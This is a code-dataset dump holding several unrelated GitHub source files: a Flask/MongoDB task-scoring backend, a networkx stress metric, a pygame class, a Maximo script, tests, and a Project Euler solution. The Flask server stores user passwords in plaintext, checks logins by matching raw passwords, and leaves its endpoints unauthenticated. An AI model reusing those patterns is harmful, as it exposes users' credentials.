len(blogs))\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\nif __name__ == \"__main__\":\n unittest.main(catchbreak=True)\n","repo_name":"daveyoumans1/OpenLending","sub_path":"OpenLending.py","file_name":"OpenLending.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18257540379","text":"from django.contrib import admin\nfrom .models import Order\n\nclass OrderAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'name',\n 'symbol',\n 'side',\n 'gtc',\n 'exp_date',\n 'value',\n 'shares',\n 'price'\n )\n\n# Register your models here.\n\nadmin.site.register(Order, OrderAdmin)","repo_name":"klewis0555/orderbook","sub_path":"backend/OrderBook/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71597680248","text":"from flask import Flask, request, jsonify, make_response\nfrom flask_restful import Resource, Api, reqparse\nimport json\nfrom pymongo import MongoClient\nfrom pprint import pprint\nimport urllib\nfrom bson import json_util, ObjectId\nimport operator\nimport random\nimport uuid\nimport http\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import MinMaxScaler\nimport base64\nimport csv\nimport pandas as pd\n\n\napp = Flask(__name__)\napi = Api(app)\nclient = MongoClient('localhost', 27017)\ndb = client['DMSS']\n\nparser = reqparse.RequestParser()\n\n\nmin_user = 3\n\nclass CreateTeams(Resource):\n def __init__(self):\n self.users = db.Users\n\n def get(self):\n userss = self.users.find({})\n atanan = 0\n teams = []\n members = []\n userss = list(userss)\n user_count = userss.__len__()\n team_count = int(user_count/min_user)\n while True:\n user_count = userss.__len__()\n if user_count == 0:\n break\n if user_count <= 2:\n r = 0\n else:\n r = random.randint(0,user_count-1)\n if user_count < min_user and atanan == 0 : \n if team_count <= 2:\n tr = 0\n else:\n tr = random.randint(0,team_count-1)\n teams[tr].append(userss[r])\n print(teams[tr])\n userss.pop(r)\n elif members.__len__() <= min_user:\n members.append(userss[r])\n userss.pop(r)\n atanan=atanan+1\n if members.__len__() == min_user:\n teams.append(members)\n members = []\n atanan=0\n for team in teams:\n tid = uuid.uuid4()\n tr = random.randint(0,team.__len__())\n manager = team[tr]\n while manager[\"is_manager\"]:\n tr = random.randint(0,team.__len__())\n manager = team[tr]\n team.pop(tr)\n for member in team:\n db.Users.update_one({\"_id\": member[\"_id\"]},{\"$set\": {\"team_id\":tid,\"is_manager\":False,\"manager_id\": manager[\"_id\"]}})\n db.Users.update_one({\"_id\": manager[\"_id\"]},{\"$set\": {\"team_id\":tid ,\"is_manager\":True,\"manager_id\": \"\"}})\n\napi.add_resource(CreateTeams, '/create', methods=['GET'])\n\nclass TaskList(Resource):\n def __init__(self):\n self.tasks = db.Tasks\n self.users = db.Users\n\n def get(self):\n user_id = request.args.get('user_id')\n tasks_of_user = self.tasks.find({\"user_id\": user_id, \"is_complete\":False})\n user = self.users.find_one({\"_id\": ObjectId(user_id)})\n results = list(tasks_of_user)\n for res in results:\n res[\"id\"] = str(res[\"_id\"])\n del res[\"_id\"]\n print(user)\n users = self.users.find({})\n newList = sorted(users, key=lambda k: k['score'], reverse=True)\n i = 1\n rank = 1\n first = newList[0][\"score\"]\n print(first)\n count = (first - user[\"score\"]) /10\n print(count)\n for res in newList:\n if res[\"_id\"] == user[\"_id\"]:\n print(res)\n rank = i\n else:\n i = i + 1\n del res[\"_id\"]\n tasks={\"results\":results,\"name\":user[\"name\"],\"score\":user[\"score\"], \"rank\":rank, \"count\":count, \"imageURL\": user[\"imageURL\"]}\n return (jsonify(tasks=tasks))\n \napi.add_resource(TaskList, '/taskList', methods=['GET'])\n\nclass DoneTaskList(Resource):\n def __init__(self):\n self.tasks = db.Tasks\n\n def get(self):\n user_id = request.args.get('user_id')\n tasks_of_user = self.tasks.find({\"user_id\": user_id, \"is_complete\":True})\n results = list(tasks_of_user)\n for res in results:\n res[\"id\"] = str(res[\"_id\"])\n del res[\"_id\"]\n return (jsonify(tasks=results))\n \napi.add_resource(DoneTaskList, '/doneTaskList', methods=['GET'])\n\nclass ManagerTaskList(Resource):\n def __init__(self):\n self.tasks = db.Tasks\n self.users = db.Users\n\n def get(self):\n user_id = request.args.get('user_id')\n print(user_id)\n ress = []\n users = self.users.find({\"manager_id\": ObjectId(user_id)})\n print(users)\n \n for user in users:\n print(user)\n tasks_of_user = self.tasks.find({\"user_id\": str(user[\"_id\"]), \"is_complete\":True, \"is_approved\":False})\n newTask = []\n for task in tasks_of_user:\n task.update( {'imageURL' : user[\"imageURL\"]} )\n newTask.append(task)\n results = list(newTask)\n ress = ress + results\n for res in ress:\n print(res)\n res[\"id\"] = str(res[\"_id\"])\n del res[\"_id\"]\n \n print(ress)\n return (jsonify(tasks=ress))\n \napi.add_resource(ManagerTaskList, '/managerTaskList', methods=['GET'])\n\nclass UpdateTask(Resource):\n def __init__(self):\n pass\n\n def post(self):\n try:\n data = request.get_json()\n print(data)\n db.Tasks.update_one({\"_id\": ObjectId(data['id'])},{\"$set\": {\"title\":data['title'],\"date\":data['date'],\"type\":data['type']}})\n return (jsonify(res=\"1\")) \n except Exception as e:\n print(e)\n return (jsonify(res=\"0\"))\n\n def delete(self):\n try:\n data = request.get_json()\n print(data)\n db.Tasks.delete_one({\"_id\": ObjectId(data['id'])})\n return '',http.HTTPStatus.OK\n except Exception as e:\n print(e)\n return '',http.HTTPStatus.NO_CONTENT\n\n \napi.add_resource(UpdateTask, '/updateTask', methods=['POST','DELETE'])\n\nclass CompleteTask(Resource):\n def __init__(self):\n pass\n\n def post(self):\n try:\n data = request.get_json()\n print(data)\n db.Tasks.update_one({\"_id\": ObjectId(data['id'])},{\"$set\": {\"is_complete\":True}})\n return '',http.HTTPStatus.OK\n except Exception as e:\n print(e)\n return '',http.HTTPStatus.NO_CONTENT\n\n \napi.add_resource(CompleteTask, '/completeTask', methods=['POST'])\n\nclass ApproveTask(Resource):\n def __init__(self):\n pass\n\n def post(self):\n try:\n data = request.get_json()\n print(data[\"id\"])\n idcik = ObjectId(data['id']['id'])\n task = db.Tasks.find_one({\"_id\":idcik})\n print(\"TASK:\", task)\n db.Tasks.update_one({\"_id\": idcik},{\"$set\": {\"is_approved\":True}})\n user = db.Users.find_one({\"_id\": ObjectId(task['user_id'])})\n print(user)\n print(task[\"user_id\"])\n db.Users.update_one({\"_id\": ObjectId(task['user_id'])},{\"$inc\":{\"score\":10}})\n return '',http.HTTPStatus.OK\n except Exception as e:\n print(\"TASK\",e)\n return '',http.HTTPStatus.NO_CONTENT\n\n \napi.add_resource(ApproveTask, '/approveTask', methods=['POST'])\n\nclass Task(Resource):\n def __init__(self):\n self.tasks = db.Tasks\n\n def get(self):\n id = request.args.get('id')\n task = self.tasks.find({\"_id\": id})\n del task[\"_id\"]\n return (jsonify(tasks=task))\n\n def post(self):\n try:\n data = request.get_json()\n task = {\n #TODO: add the more properties of task\n \"user_id\": data['user_id'],\n \"title\": data['title'],\n \"date\": data['date'],\n \"type\": data['type'],\n \"is_complete\":False,\n \"is_approved\":False\n }\n db.Tasks.insert_one(task)\n print(task)\n return '',http.HTTPStatus.OK\n except Exception as e:\n print(e)\n return '',http.HTTPStatus.NO_CONTENT\n \napi.add_resource(Task, '/task', methods=['GET','POST'])\n\nclass ScoreTable(Resource):\n def __init__(self):\n self.users = db.Users\n\n def get(self):\n users = self.users.find({})\n newList = sorted(users, key=lambda k: k['score'], reverse=True) \n names = []\n for res in newList:\n if res[\"is_manager\"]:\n continue\n else:\n dic = {\"name\": str(res[\"name\"] + \" \" + res[\"surname\"]), \"score\": res[\"score\"], \"imageURL\": res[\"imageURL\"]}\n names.append(dic)\n return (jsonify(scoreTable=names))\n \napi.add_resource(ScoreTable, '/scoreTable', methods=['GET'])\n\n\nclass Profile(Resource):\n def __init__(self):\n self.users = db.Users\n\n def get(self):\n user_id = request.args.get('user_id')\n user = self.users.find_one({\"_id\": ObjectId(user_id)})\n if not user[\"is_manager\"]:\n manager = self.users.find_one({\"_id\": ObjectId(user[\"manager_id\"])})\n manager = manager[\"name\"] + \" \" + manager[\"surname\"]\n else:\n manager = user[\"name\"] + \" \" + user[\"surname\"]\n friends = self.users.find({\"team_id\": user[\"team_id\"]})\n friends = list(friends)\n newList = sorted(friends, key=lambda k: k['score'], reverse=True) \n print(\"new\",newList)\n names= []\n\n for friend in newList:\n if friend[\"is_manager\"]:\n continue\n else:\n dic = {\"name\": str(friend[\"name\"] + \" \" + friend[\"surname\"]), \"score\": friend[\"score\"]}\n names.append(dic)\n \n print(names)\n name = user['name'] + \" \" + user[\"surname\"]\n return (jsonify(score=user['score'], friends=names, manager=manager, name=name, imageURL=user['imageURL']))\n\napi.add_resource(Profile, '/profile' , methods=['GET'])\n\nclass Register(Resource):\n def __init__(self):\n self.users = db.Users\n def post(self):\n try:\n data = request.get_json()\n print(data)\n user = {\n \"name\": data['name'],\n \"surname\": data['surname'],\n \"email\": data['email'],\n \"password\": data['password'],\n \"score\": 0,\n \"admin\": False,\n \"is_manager\": False,\n \"team_id\": \"\",\n \"imageURL\": data['imageURL']\n }\n db.Users.insert_one(user)\n print(user)\n return jsonify(res=\"1\")\n except Exception as e:\n print(e)\n return jsonify(res=\"0\")\n\napi.add_resource(Register, '/register', methods=['POST'])\n\nclass User(Resource):\n def __init__(self):\n self.users = db.Users\n\n def get(self):\n user_id = request.args.get('user_id')\n user = self.users.find_one({\"_id\": user_id})\n return (jsonify(user=user))\n\n def post(self):\n data = request.get_json()\n user = self.users.find_one({\"email\": data[\"email\"], \"password\": data[\"password\"]})\n if user is not None:\n user[\"id\"] = str(user[\"_id\"])\n #return make_response(jsonify(isManager=user[\"is_manager\"],userID=[\"_id\"]),200)\n return jsonify(res=\"1\",isManager=user[\"is_manager\"],userID=user[\"id\"])\n \n else:\n print(user)\n #return make_response('',204)\n return jsonify(res=\"0\")\n \n def delete(self, user_id):\n self.users.delete_one({\"_id\": user_id})\n\n\n \napi.add_resource(User, '/user/' ,'/user', '/', methods=['GET', 'POST'])\n\nclass WebUser(Resource):\n def __init__(self):\n self.users = db.Users\n\n def post(self):\n data = request.get_json()\n user = self.users.find_one({\"email\": data[\"email\"], \"password\": data[\"password\"]})\n if user is not None:\n user[\"id\"] = str(user[\"_id\"])\n return make_response(jsonify(isManager=user[\"is_manager\"],userID=[\"_id\"]),200)\n \n else:\n print(user)\n return make_response('',204)\n\n\n \napi.add_resource(WebUser, '/webUser', methods=['POST'])\n\nclass FileUpload(Resource):\n def __init__(self):\n self.users = db.Users\n \n def post(self):\n data = request.get_json()\n print(data)\n data = data['file']\n dd = data.strip('data:text/plain;base64,')\n print(\"parsed:\",dd)\n print(\"parse done\")\n text = base64.b64decode(dd).decode('UTF-8')\n f = open(\"temp_file.csv\", \"w\")\n f.write(text)\n f.close()\n df = pd.read_csv(\"temp_file.csv\") \n records_ = df.to_dict(orient = 'records')\n db.Emp.insert_many(records_ )\n \napi.add_resource(FileUpload, '/file', methods=['POST'])\n\nclass AnalysisResults(Resource):\n def __init__(self):\n self.results = db.Results\n \n def get(self):\n results = self.results.find({})\n results = list(results)\n for res in results:\n del res[\"_id\"]\n return (jsonify(results=results))\n\n def post(self):\n data = request.get_json()\n print(data)\n \n\napi.add_resource(AnalysisResults, '/results', methods=['GET'])\n\nclass Regions(Resource):\n def __init__(self):\n self.regions = db.FileInfo\n \n def get(self):\n regions = self.regions.find({})\n regions = list(regions)\n print(regions)\n for res in regions:\n del res[\"_id\"]\n print(regions)\n return (jsonify(regions=regions))\n\n def post(self):\n try:\n data = request.get_json()\n print(data)\n file_info = {\n \"region\": data['region']\n }\n db.FileInfo.insert_one(file_info)\n print(file_info)\n return '',http.HTTPStatus.OK\n except Exception as e:\n print(e)\n return '',http.HTTPStatus.NO_CONTENT \n \n\napi.add_resource(Regions, '/regions', methods=['GET','POST'])\n\nclass Regs(Resource):\n def __init__(self):\n self.regions = db.FileInfo\n \n def get(self):\n regions = self.regions.find({})\n regions = list(regions)\n print(regions)\n regs = []\n for res in regions:\n dic = {\"value\": res[\"region\"], \"label\": res[\"region\"]}\n regs.append(dic)\n print(regs)\n return (jsonify(regions=regs))\n\n\n \napi.add_resource(Regs, '/regs', methods=['GET'])\n\n\n\nclass Gift(Resource):\n def __init__(self):\n self.regions = db.FileInfo\n \n def get(self):\n regions = self.regions.find({})\n regions = list(regions)\n print(regions)\n regs = []\n for res in regions:\n regs.append(res[\"region\"])\n print(regs)\n return (jsonify(regions=regs))\n\n\n \napi.add_resource(Gift, '/gift', methods=['GET'])\n\nclass UpdateDataset(Resource):\n\n def post(self):\n try:\n data = request.get_json()\n print(data)\n record = {\n \"yetki\": data['yetki'],\n \"yapili\": data['yapili'],\n \"esyali\": data['esyali'],\n \"fiyat\": data['fiyat'],\n \"bolum\": data['bolum'],\n \"m2\": data['m2'],\n \"katSayisi\": data['katSayisi'],\n \"bulKat\": data['bulKat'],\n \"aidat\": data['aidat'],\n \"region\": data['region'],\n \"type\": data['type']\n }\n db.Records.insert_one(record)\n print(record)\n return '',http.HTTPStatus.OK\n except Exception as e:\n print(e)\n return '',http.HTTPStatus.NO_CONTENT \n\napi.add_resource(UpdateDataset, '/updateDataset', methods=['POST'])\n\nclass Analyze(Resource):\n def __init__(self):\n self.records = db.Emp\n\n\n def get(self):\n type = request.args.get('type')\n region = request.args.get('region')\n records = self.records.find({type: type, region: region})\n records = list(records)\n df = pd.DataFrame(records) \n df = df.rename(columns={'Fiyat': 'class'})\n X = df.drop(['class'],axis=1)\n y = df['class']\n X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)\n scaler = MinMaxScaler()\n X_train_scaled = scaler.fit_transform(X_train)\n X_test_scaled = scaler.transform(X_test)\n DTC = DecisionTreeClassifier(max_depth=None).fit(X_train_scaled, y_train)\n new_data = {\n \"yapili\":request.args.get('yapili'),\n \"esyali\":request.args.get('esyali'),\n \"m2\": request.args.get('m2'),\n \"katSayisi\": request.args.get('katSayisi'),\n \"bulKat\": request.args.get('bulKat'),\n \"aidat\": request.args.get('aidat'),\n \"region\": request.args.get('region'),\n \"type\": request.args.get('type')\n }\n y_predicted = DTC.predict(new_data)\n print(y_predicted)\n return jsonify(result=y_predicted)\n \n \napi.add_resource(Analyze, '/analyze', methods=['GET'])\n\nclass Ranking(Resource):\n def __init__(self):\n self.users = db.Users\n\n def get(self):\n id = request.args.get('id')\n users = self.users.find({})\n newList = sorted(users, key=lambda k: k['score'], reverse=True)\n i = 1\n rank = 1\n print(id)\n print(type(id))\n for res in newList:\n if res[\"_id\"] == id:\n print(res)\n rank = i\n else:\n i = i + 1\n del res[\"_id\"]\n return (jsonify(rank=rank))\n \napi.add_resource(Ranking, '/ranking', methods=['GET'])\n\nclass HomePage(Resource):\n def __init__(self):\n self.users = db.Users\n \n def get(self):\n id = request.args.get('id')\n user = self.users.find_one({\"_id\": ObjectId(id)})\n print(user)\n users = self.users.find({})\n newList = sorted(users, key=lambda k: k['score'], reverse=True)\n i = 1\n rank = 1\n for res in newList:\n if res[\"_id\"] == id:\n rank = i\n else:\n i = i + 1\n del res[\"_id\"]\n name = user['name'] + \" \" + user[\"surname\"]\n return (jsonify(name=name, score=user['score'], rank=rank))\n\napi.add_resource(HomePage, '/homepage', methods=['GET'])\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port='8086')\n\n\n\n\n","repo_name":"duygusarialtun/DMSSProject","sub_path":"DMSSBackend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":18856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25502044056","text":"#Author\n#Felice De Luca\n#https://github.com/felicedeluca\n\nimport networkx as nx\nimport math\n\n\ndef euclidean_distance(source, target):\n\n x_source1 = float(source['pos'].split(\",\")[0])\n x_target1 = float(target['pos'].split(\",\")[0])\n\n y_source1 = float(source['pos'].split(\",\")[1])\n y_target1 = float(target['pos'].split(\",\")[1])\n\n geomDistance = math.sqrt((x_source1 - x_target1)**2 + (y_source1 - y_target1)**2)\n\n return geomDistance\n\ndef scale_graph(G, alpha):\n\n H = G.copy()\n\n for currVStr in nx.nodes(H):\n\n currV = H.nodes[currVStr]\n\n x = float(currV['pos'].split(\",\")[0])\n y = float(currV['pos'].split(\",\")[1])\n\n x = x * alpha\n y = y * alpha\n\n currV['pos'] = str(x)+\",\"+str(y)\n\n return H\n\ndef computeScalingFactor(S, all_sp):\n num = 0\n den = 0\n\n nodes = list(nx.nodes(S))\n\n for i in range(0, len(nodes)):\n\n sourceStr = nodes[i]\n source = S.nodes[sourceStr]\n\n for j in range(i+1, len(nodes)):\n\n targetStr = nodes[j]\n\n if(sourceStr == targetStr):\n continue\n\n target = S.nodes[targetStr]\n\n graph_theoretic_distance = 0\n\n graph_theoretic_distance = len(all_sp[sourceStr][targetStr])-1\n\n geomDistance = euclidean_distance(source, target)\n\n if (graph_theoretic_distance <= 0):\n continue\n\n weight = 1/(graph_theoretic_distance**2)\n\n num = num + (graph_theoretic_distance * geomDistance * weight)\n den = den + (weight * (geomDistance**2))\n\n scale = num/den\n\n return scale\n\n\ndef stress(S, G=None, weighted=True, all_sp=None):\n '''Computes the strees of the layout S if the parameter G\n is passed it computes the stress of the layout S\n with respect the graph distances on G'''\n\n\n S_original = S.copy()\n\n alpha = 1\n\n if all_sp is None:\n if(G is None):\n if(weighted):\n # converting weights in float\n all_weights_n = nx.get_node_attributes(S, \"weight\")\n for nk in all_weights_n.keys():\n all_weights_n[nk] = float(all_weights_n[nk])\n nx.set_node_attributes(S, all_weights_n, \"weight\")\n\n all_weights_e = nx.get_edge_attributes(S, \"weight\")\n for ek in all_weights_e.keys():\n all_weights_e[ek] = float(all_weights_e[ek])\n nx.set_edge_attributes(S, all_weights_e, \"weight\")\n all_sp = nx.shortest_path(S, weight=\"weight\")\n else:\n all_sp = nx.shortest_path(S)\n else:\n if(weighted):\n # converting weights in float\n all_weights_n = nx.get_node_attributes(G, \"weight\")\n for nk in all_weights_n.keys():\n all_weights_n[nk] = float(all_weights_n[nk])\n nx.set_node_attributes(G, all_weights_n, \"weight\")\n\n all_weights_e = nx.get_edge_attributes(G, \"weight\")\n for ek in all_weights_e.keys():\n all_weights_e[ek] = float(all_weights_e[ek])\n nx.set_edge_attributes(G, all_weights_e, \"weight\")\n all_sp = nx.shortest_path(G, weight=\"weight\")\n else:\n all_sp = nx.shortest_path(G)\n\n alpha = computeScalingFactor(S_original, all_sp)\n\n S = scale_graph(S_original, alpha)\n\n vertices = list(nx.nodes(S))\n\n stress = 0\n\n for i in range(0, len(vertices)):\n\n sourceStr = vertices[i]\n source = S.nodes[sourceStr]\n\n for j in range(i+1, len(vertices)):\n\n targetStr = vertices[j]\n target = S.nodes[targetStr]\n\n graph_theoretic_distance = len(all_sp[sourceStr][targetStr])-1\n eu_dist = euclidean_distance(source, target)\n\n if (graph_theoretic_distance <= 0):\n continue\n\n delta_squared = (eu_dist - graph_theoretic_distance)**2\n weight = 1/(graph_theoretic_distance**2)\n stress = stress + (weight * delta_squared)\n\n scale_graph(S, 1/alpha)\n\n\n stress = round(stress, 3)\n\n return stress\n","repo_name":"cns-iu/map4sci","sub_path":"data-processor/src/quality_measurement/original/stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"38517186683","text":"\"\"\"\r\n platformClass.py\r\n November 21st, 2016\r\n\r\n Class which creates platforms\r\n randomly of various sizes.\r\n\r\n Dylan Grandjean\r\n\"\"\"\r\nimport pygame, random\r\n\r\nclass PlatformClass(pygame.sprite.Sprite):\r\n def __init__(self, row, speed):\r\n \"\"\" Initialize class and pass in a row value and the current\r\n game speed.\"\"\"\r\n pygame.sprite.Sprite.__init__(self)\r\n\r\n #assign a row value to the platform. This value won't ever change\r\n self.row = row\r\n\r\n #assign random values for reseting purposes\r\n self.i = random.randint(30,240)\r\n self.x = random.randint(960, 3000)\r\n self.sec = 0\r\n\r\n #load images\r\n self.images = []\r\n self.images.append(pygame.image.load(\"assets/images/platforms/platform[0].png\"))\r\n self.images.append(pygame.image.load(\"assets/images/platforms/platform[1].png\"))\r\n self.images.append(pygame.image.load(\"assets/images/platforms/platform[2].png\"))\r\n\r\n #determine platform size and create rectangle\r\n self.n = random.randint(0, 2)\r\n self.image = self.images[self.n]\r\n self.image = self.image.convert()\r\n self.image.set_colorkey((255, 255, 255))\r\n self.rect = self.image.get_rect()\r\n\r\n #determine coordinates\r\n self.rect.left = self.x\r\n self.rect.centery = self.row\r\n\r\n #initialize speed relative to game speed\r\n self.dx = speed\r\n\r\n def update(self, screen, speed):\r\n \"\"\" Move the platform towards the left and resets its position\r\n and size whenever it exists the screen.\"\"\"\r\n self.rect.centerx -= speed\r\n if self.rect.right < 0:\r\n self.sec += 1\r\n if self.sec == self.i:\r\n self.reset(screen)\r\n\r\n def reset(self, screen):\r\n \"\"\" Changes the size, rectangle, and image of platform\r\n whenever it exists the screen.\"\"\"\r\n #assign new random values for resetting purposes\r\n self.i = random.randint(30,240)\r\n self.sec = 0\r\n\r\n #detemrine new size, image and rectangle\r\n self.n = random.randint(0, 2)\r\n self.image = self.images[self.n]\r\n self.image = self.image.convert()\r\n self.image.set_colorkey((255, 255, 255))\r\n self.rect = self.image.get_rect()\r\n\r\n #determine nes coordinates\r\n self.rect.left = screen.get_width()\r\n self.rect.centery = self.row\r\n \r\n \r\n","repo_name":"DDSGrandjean/Python_aroundTheWorld_fall2016","sub_path":"platformClass.py","file_name":"platformClass.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9908057563","text":"# AUTOSCRIPT NAME: EX2_POREVNO\n# CREATEDDATE: 2018-05-14 01:48:02\n# CREATEDBY: U3LO\n# CHANGEDATE: 2018-05-17 06:23:47\n# CHANGEBY: U34H\n# SCRIPTLANGUAGE: python\n# STATUS: Draft\n\nfrom psdi.server import MXServer\n\ninvoiceMbo=mbo.getOwner();\ninvoiceLineMboSet=invoiceMbo.getMboSet(\"INVOICELINE\");\ninvoicenum=mbo.getString(\"INVOICENUM\");\ninvoiceLineMboSet.reset();\ninvoiceMboSet=mbo.getMboSet(\"INVOICE\");\n\ndescriptionInvoice=invoiceMbo.getString(\"DESCRIPTION\");\n\npoRevisioNum='';\n\ninvoiceMbo.setValue(\"DESCRIPTION\",\"\");\n\npoMboSet=invoiceMbo.getMboSet(\"PO\");\npoMboSet.reset();\n\nstatus=invoiceMbo.getString(\"STATUS\");\n\nif(poMboSet is not None and poMboSet!=''):\n poRevisioNum=poMboSet.getMbo(0).getString(\"REVISIONNUM\");\n \ninvoicelineCount=invoiceLineMboSet.count();\n\nif(invoicelineCount>0):\n for i in range(invoicelineCount) :\n invoicelineMbo=invoiceLineMboSet.getMbo(i);\n invoicelineMbo.setValue(\"POREVISIONNUM\",poRevisioNum)\n\ninvoiceMbo.setValue(\"DESCRIPTION\",descriptionInvoice);","repo_name":"git786hub/Dynatrace_python","sub_path":"src/EX2_POREVNO.py","file_name":"EX2_POREVNO.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5153934443","text":"import re\nfrom collections import Counter\n\ndef remove_html_tags(text: str) -> str:\n expression = re.compile(r'<[^>]+>|/>|br />|= 5])\n\n counter = Counter(data)\n frequencies = sorted(counter.items(), key=lambda x: x[1], reverse=True)\n wordcloud = [word for word, _ in frequencies]\n text = remove_html_tags(', '.join(wordcloud[:15]))\n\n return text\n","repo_name":"DSM-FATEC/fatec_dsm_pln_chatbot_movies","sub_path":"backend/parsers/word_cloud_parser.py","file_name":"word_cloud_parser.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70106630008","text":"import unittest\nfrom nsswstunnel.reactor import *\n\nclass NSSReactorTests(unittest.TestCase):\n def test_http(self):\n \"\"\"a simplistic test by building http client and run a GET query\"\"\"\n install()\n import os\n from twisted.web.client import HTTPClientFactory\n from twisted.internet import reactor\n nss.nss_init('sql:' + os.path.expanduser('~/.pki/nssdb'))\n ssl.set_domestic_policy()\n # nss.set_password_callback(password_callback)\n\n factory = HTTPClientFactory(b'https://baidu.com/')\n # factory = HTTPClientFactory(b'http://baidu.com/')\n\n def cb_response(*args, **kwargs):\n print('response: %r, %r' % (args, kwargs))\n self.fail()\n\n def cb_err(*args, **kwargs):\n print('err: %r, %r' % (args, kwargs))\n self.fail()\n\n def cb_close(ignored):\n reactor.stop()\n\n factory.deferred.addCallbacks(cb_response, cb_err)\n factory.deferred.addBoth(cb_close)\n # reactor.connectTCP('baidu.com', 80, factory)\n reactor.connectSSL('baidu.com', 443, factory, contextFactory=None)\n reactor.run()\n\n","repo_name":"tdihp/nsswstunnel","sub_path":"nsswstunnel/test/_test_reactor.py","file_name":"_test_reactor.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28241397487","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nProject Euler Problem 69:\n\nEuler's Totient function, φ(n) [sometimes called the phi function], is used to determine the number of numbers less than\nn which are relatively prime to n. For example, as 1, 2, 4, 5, 7, and 8, are all less than nine and relatively prime to\nnine, φ(9)=6.\n\nn Relatively Prime φ(n) n/φ(n)\n2 1 1 2\n3 1,2 2 1.5\n4 1,3 2 2\n5 1,2,3,4 4 1.25\n6 1,5 2 3\n7 1,2,3,4,5,6 6 1.1666...\n8 1,3,5,7 4 2\n9 1,2,4,5,7,8 6 1.5\n10 1,3,7,9 4 2.5\n\nIt can be seen that n=6 produces a maximum n/φ(n) for n ≤ 10.\n\nFind the value of n ≤ 1,000,000 for which n/φ(n) is a maximum.\n\"\"\"\n\n# Brute force-ish, runs in ~40 seconds\n\nfrom sympy.ntheory import primefactors\nfrom functools import reduce\nimport operator\n\ndef phi(n):\n return round(n * reduce(operator.mul, map(lambda p: 1 - 1/p, primefactors(n))))\n\nmax_frac = -1\nmax_n = 0\n\nfor n in range(2, 1000000):\n frac = n / phi(n)\n if frac > max_frac:\n max_frac = frac\n max_n = n\n\nprint(max_n)\n","repo_name":"ryandancy/project-euler","sub_path":"problem69.py","file_name":"problem69.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72873542329","text":"from typing import Optional\nfrom unittest.mock import Mock, call, patch\n\nfrom pytest import fixture, mark\n\nfrom wxviews import inspection\nfrom wxviews.inspection import ViewInspectionFrame, ViewInspectionInfoPanel, ViewInspectionTool, ViewInspectionTree\nfrom wxviews.widgets.rendering import WxNode\n\n\n@fixture\ndef tool_fixture(request):\n with patch(f'{inspection.__name__}.get_root') as get_root:\n root = WxNode(Mock(), Mock())\n top_window = Mock()\n root.instance.GetTopWindow = Mock()\n root.instance.GetTopWindow.side_effect = lambda: top_window\n get_root.side_effect = lambda: root\n\n request.cls.root = root\n request.cls.top_window = top_window\n with patch(f'{inspection.__name__}.{ViewInspectionFrame.__name__}') as frame_init:\n frame = Mock()\n frame_init.side_effect = lambda *a, **kw: frame\n request.cls.frame_init = frame_init\n request.cls.frame = frame\n request.cls.tool = ViewInspectionTool()\n yield frame_init\n\n\n@mark.usefixtures('tool_fixture')\nclass ViewInspectionToolTests:\n \"\"\"ViewInspectionTool tests\"\"\"\n\n frame: Mock\n frame_init: Mock\n top_window: Mock\n root: WxNode\n tool: ViewInspectionTool\n\n def test_creates_frame(self):\n \"\"\"should create frame with parameters\"\"\"\n pos = Mock()\n size = Mock()\n config = Mock()\n crust_locals = Mock()\n tool = ViewInspectionTool(pos = pos, size = size, config = config, crust_locals = crust_locals)\n\n tool.show()\n\n assert self.frame_init.call_args == call(\n parent = self.top_window,\n pos = pos,\n size = size,\n config = config,\n locals = crust_locals,\n app = self.root.instance,\n root = self.root\n )\n\n @mark.parametrize('select_obj', [None, Mock()])\n def test_sets_passed_object(self, select_obj):\n \"\"\"should create frame with parameters\"\"\"\n expected = select_obj if select_obj else self.root\n\n self.tool.show(select_obj)\n\n assert self.frame.SetObj.call_args == call(expected)\n\n @mark.parametrize('select_obj', [None, Mock()])\n def test_shows_frame(self, select_obj):\n \"\"\"should create frame with parameters\"\"\"\n self.tool.show(select_obj)\n\n assert self.frame.Show.called\n assert self.frame.Raise.called\n\n\n@fixture\ndef frame_fixture(request):\n with patch(f'{inspection.__name__}.InspectionFrame.__init__') as frame_init:\n frame_init.side_effect = _frame_init\n request.cls.frame_init = frame_init\n yield frame_init\n\n\ndef _frame_init(frame, *_, **__):\n frame.locals = {}\n\n\n@mark.usefixtures('frame_fixture')\nclass ViewInspectionFrameTests:\n \"\"\"ViewInspectionFrame tests\"\"\"\n\n frame_init: Mock\n\n def tests_sets_root_to_locals(self):\n \"\"\"should add root node to crust locals\"\"\"\n pos = Mock()\n size = Mock()\n config = Mock()\n crust_locals = Mock()\n root = Mock()\n parent = Mock()\n app = Mock()\n\n frame = ViewInspectionFrame(\n parent = parent, pos = pos, size = size, config = config, locals = crust_locals, 